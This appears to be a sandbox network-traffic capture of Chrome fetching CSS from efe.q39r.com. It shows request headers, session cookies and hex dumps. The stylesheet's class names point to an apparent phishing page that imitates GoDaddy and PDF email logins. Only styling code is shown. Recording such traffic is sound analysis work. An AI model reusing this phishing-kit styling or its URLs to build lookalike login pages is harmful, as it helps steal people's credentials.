                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC632INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: text/css;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="34fI8EabNdid6714"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQa5eJ%2FHlgTJ5rtZMxouS0tbbuh%2BjkPg0K3JJS43oq%2BVV54RTGAQkp0ygVxsI71lpAiFxKMpRQ7rF%2BCej46DFbbSASXSNB2tayGJvIKT9Ybg%2BGOCtuJ5KtQJ8TToiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fad9ffea812e5-ATL
                                                                                  2024-04-25 16:23:33 UTC737INData Raw: 33 36 31 30 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                                                  Data Ascii: 3610*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 61 7b 63 6f 6c 6f 72 3a
                                                                                  Data Ascii: rosoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f
                                                                                  Data Ascii: kground:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .lds-spinner div:first-child{transform:rotate(0);animation-delay:-1.1s}#sections_pdf .lds-spinner div:nth-child(2){transform:ro
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75
                                                                                  Data Ascii: (0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:relative;margin-top:30px;margin-left:auto;margin-right:auto;width:100%;display:flex;justify-content:center;flex-direction:colu
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32 30 38 33 33 33 33 69 6e 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 3a 68 6f 76 65 72 2c 2e 62 61 63 6b 3a 68 6f 76 65 72 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e
                                                                                  Data Ascii: enter;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052083333in}#sections .opts:hover,.back:hover,.row.tile:not(.no-pick):hover{background-color:rgba(0,0,0,.1)}#sections_pdf .login
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64
                                                                                  Data Ascii: .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15px;border-rad
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 36 35 25 7b 6c 65 66 74 3a 36 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65
                                                                                  Data Ascii: opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-timing-function:linear}65%{left:60%;animation-timing-function:ease
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c
                                                                                  Data Ascii: ntainer.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:table-cell;max-width:100%}#sections .sectioncontent{position:rel
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 2e 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 23 61 75 74 68 63 61 6c 6c 64 65 73 63 7b 66 6f 6e 74 2d 73 69 7a 65
                                                                                  Data Ascii: t:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0,.8)}.input::placeholder{font-size:15px}#authcalldesc{font-size
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 32
                                                                                  Data Ascii: radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.input-group-addon{border-width:2


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.1749746172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1395OUTGET /abx86uorshef28 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: text/css,*/*;q=0.1
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: style
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC630INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: text/css;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="abx86uorshef28"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NI%2BkMQCH2Ul%2B90SGCcFpsTtjR3%2FNwfFrpKFfaNmtFiugF3yfn6TjyhBlGDg9d%2Baq076LCQWW5kWAEC9CB%2Bz1Ncz5oY3Z8d4A4vbhaqtXhCscf3f99oP3UK3q22U76A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada00ca5672d-ATL
                                                                                  2024-04-25 16:23:33 UTC739INData Raw: 33 37 62 31 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                                                  Data Ascii: 37b1@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family:
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 2d 73 61 67 65 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72
                                                                                  Data Ascii: eight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: ur
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20
                                                                                  Data Ascii: .5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em)
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73
                                                                                  Data Ascii: size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block: var(--uxSpace--padding-size);}#s
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 35 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74
                                                                                  Data Ascii: 3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize5: calc(var(--uxText--font
